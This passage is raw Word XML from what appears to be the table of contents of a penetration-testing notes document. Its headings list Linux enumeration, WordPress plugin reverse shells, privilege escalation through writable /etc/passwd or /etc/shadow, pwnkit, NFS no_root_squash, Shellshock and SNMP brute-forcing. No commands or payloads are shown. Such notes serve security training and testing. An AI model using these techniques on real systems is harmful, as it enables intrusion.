            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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6h2l1g7q2m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Scheduled Tasks (Cron) Enumeration</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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q3y40n9ph3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Checking installed cron jobs</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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62olp4aoff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Checking Cron Log files</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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j1wrxwdmh8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Installed Programs Enumeration</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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6o4a5hlp2je">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Insecure File Enumeration</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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40thg3zx14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Unmounted Drives Enumeration</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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24iwobk4yc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Kernel Enumeration</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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pspbov7id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Kernel Exploitation</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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8htvwcya04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User Trail Enumeration</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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kka1d9spoj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Service footprint enumeration</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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16zzstzltr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systemctl &amp; systemd enumeration</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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b7ulme80ic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Backups</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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pgsh6ewelr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XSS (Cross-Site Scripting)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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73binu7bnr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Understand XSS Types</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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sq519jszu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CSRF (Cross-Site-Request-Forgery)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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unuhmwyqzq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XXE (XML External Entity)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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o2pz1bh9y07">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SSTI (Server Side Template Injection)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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gim39rt51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Where SSTI is seen</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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dv39t2dzaj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SSRF</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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xctn5x38r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SSRF Works</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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ooqp43mms9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WordPress</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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teqs9l319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w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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sipy9l29b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WPScan in general to enumerate and find usernames</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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uatjrcreb7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WPScan to bruteforce usernames and passwords in WordPress</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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97apvbz1u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WPScan to find vulnerable plugins</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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nq953r1zwo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Admin Privileges using "Editor" and header.php</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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ud4l95m81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using "Theme Editor" and 404.php</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019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aaql5aykl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Admin Privileges using "Add new" button for plugins</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019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soc1dyuos7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Admin Privileges using "Plugin Editor" button for plugins</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019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wdafu14ep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Reverse shell with Admin Privileges using AdRotate Plugin</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019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dqugp9vl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privilege escalate in Wordpress after getting terminal</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019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kvjj0wmnep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Abuse Backup Migration plugin and Relay Attack for priv esc</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019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1nu1fo6on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Reset admin password in wordpress_db MySQL database (and technically any other MySQL database)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019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527w0wrsha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add user in wordpress_db MySQL database</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019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swbls4v9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reverse shell from Simple File List 4.2.2 (NO AUTHENTICATION)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019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ei6hcu4oi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LFI with Site Editor 1.1.1 plugin</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019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712xb90eic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a sudo user if you can edit /etc/sudoers</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019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cwm4xjidf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sudo user if you have root privileges (get out of limited shell)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019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jfg1isu64j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add root user if /etc/passwd is writable</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019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dblocgvkwb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/etc/passwd</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019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wvju090ac1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/etc/shadow</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019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5miv8yie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exploit /etc/shadow when you can write to it</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019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k70bem81tcg">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Exiftool</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A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fg4zyatke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Exiftool vulnerability and cron job</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A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l4wv72ffzq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Photos</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A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48tfjcijo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Command Injection for downloading photos:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A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75oo99wfit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Steganography</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A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6ntkoqtzkp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NFS</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A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egqexyoj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Abusing no_root_squash configuration to priv esc</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A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1480nv5f8k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Impersonation (editing UID/GID) to read file/directory for NFS</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A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0kepk9ks67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Squid proxy (squid-cache)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A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ecplbj2x5q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Shellshock/Bashbug (CGI-Bin)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A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fv19khz980s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Sudo</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A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vdgyxc70k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Root shell using sudo</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A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jfkey69z3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pwnkit and polkit (/usr/bin/pwnkit) (CVE-2021-4034)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A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t5pcwcpee7n">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SNMP</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A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efx5bywxt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SNMP Config Files</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A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hd6ecmcgn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Explaining all tools (onesixtyone, snmp-brute, snmp-check, snmpbulkwalk, snmpwalk)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A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fwml49emx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onesixtyone</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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5k3npju58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snmp-brute</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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vb16ppsth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snmp-check</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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l5tzoh1z3n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snmpbulkwalk</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
